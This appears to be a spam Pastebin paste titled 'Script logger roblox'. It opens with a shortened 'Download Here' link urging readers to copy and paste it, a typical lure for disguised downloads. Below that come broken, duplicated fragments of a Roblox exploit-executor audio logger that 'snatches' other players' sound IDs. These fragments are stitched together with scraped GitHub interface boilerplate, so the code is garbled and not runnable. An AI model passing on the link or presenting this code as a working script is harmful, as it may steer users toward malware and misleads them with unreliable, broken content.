Advertisement
Guest User

Script logger roblox

a guest
Nov 10th, 2024
379
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.59 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/35kmwred (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. AUDIO LOGGER
  10. local LogRecent = false --// Setting this to true will make it so the logger won't log anything played by the same player more than once until they play a different audio.
  11. getgenv().SpecialTools =
  12. Hashes.Style = (not HashesOnly and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  13. IDs.Style = (not IDsOnly and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  14. Self.Style = (not LogSelf and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  15. Recent.Style = (not LogRecent and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  16. Active.Style = (not IsActive and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  17. Hashes.Style = (not HashesOnly and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  18. IDs.Style = (not IDsOnly and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  19. Self.Style = (not LogSelf and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  20. Recent.Style = (not LogRecent and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  21. Active.Style = (not IsActive and Enum.ButtonStyle.RobloxRoundButton) or Enum.ButtonStyle.RobloxRoundDefaultButton
  22. local "rbxasset://sounds.+") or string.match(Sound.SoundId, "&hash=.+") or string.match(Sound.SoundId, "&0hash=.+") or string.match(Sound.SoundId, "%d+")
  23. Id = string.sub(Id, (string.sub(Id, 1, 6) == "&hash=" and 7) or (string.sub(Id, 1, 7) == "&0hash=" and 8), string.len(Id))
  24. if Continue and (LogRecent or (not LogRecent and ((MostRecentAudio[Plr] and MostRecentAudio[Plr] ~= Id) or not MostRecentAudio[Plr]))) then
  25. local "rbxasset://sounds.+") or string.match(Sound.SoundId, "&hash=.+") or string.match(Sound.SoundId, "%d+")
  26. Id = string.sub(Id, (string.sub(Id, 1, 6) == "&hash=" and 7) or (string.sub(Id, 1, 7) == "&0hash=" and 8), string.len(Id))
  27. if Continue and (LogRecent or (not LogRecent and ((MostRecentAudio[Plr] and MostRecentAudio[Plr] ~= Id) or not MostRecentAudio[Plr]))) then
  28. Print("SoundId was changed.\nSoundId: " .. Id .. "\nPlayer: " .. Plr.Name .. "\nAncestry: " .. Sound:GetFullName() .. "\nName: " .. (Info or "Error fetching Name"))
  29. if IsActive and Info and not HookedAudios[Sound] and (LogSelf or (not LogSelf and Plr ~= Players.LocalPlayer)) and ((IsHash and not IDsOnly and HashesOnly) or (not IsHash and not HashesOnly and IDsOnly) or (HashesOnly and IDsOnly)) then
  30. Print((IsHash and "Snatched Audio (HASH)" or "Snatched Audio") .. "\nSoundId: " .. (Id or "Error fetching Id") .. "\nPlayer: " .. Plr.Name .. "\nAncestry: " .. Sound:GetFullName() .. "\nName: " .. (Info or "Error fetching Name"))
  31. jacobselbo/Roblox-Logger
  32. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  33. Name already in use
  34. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  35. Sign In Required
  36. Please sign in to use Codespaces.
  37. Launching GitHub Desktop
  38. If nothing happens, download GitHub Desktop and try again.
  39. Launching GitHub Desktop
  40. If nothing happens, download GitHub Desktop and try again.
  41. Launching Xcode
  42. If nothing happens, download Xcode and try again.
  43. Launching Visual Studio Code
  44. Your codespace will open once ready.
  45. There was a problem preparing your codespace, please try again.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement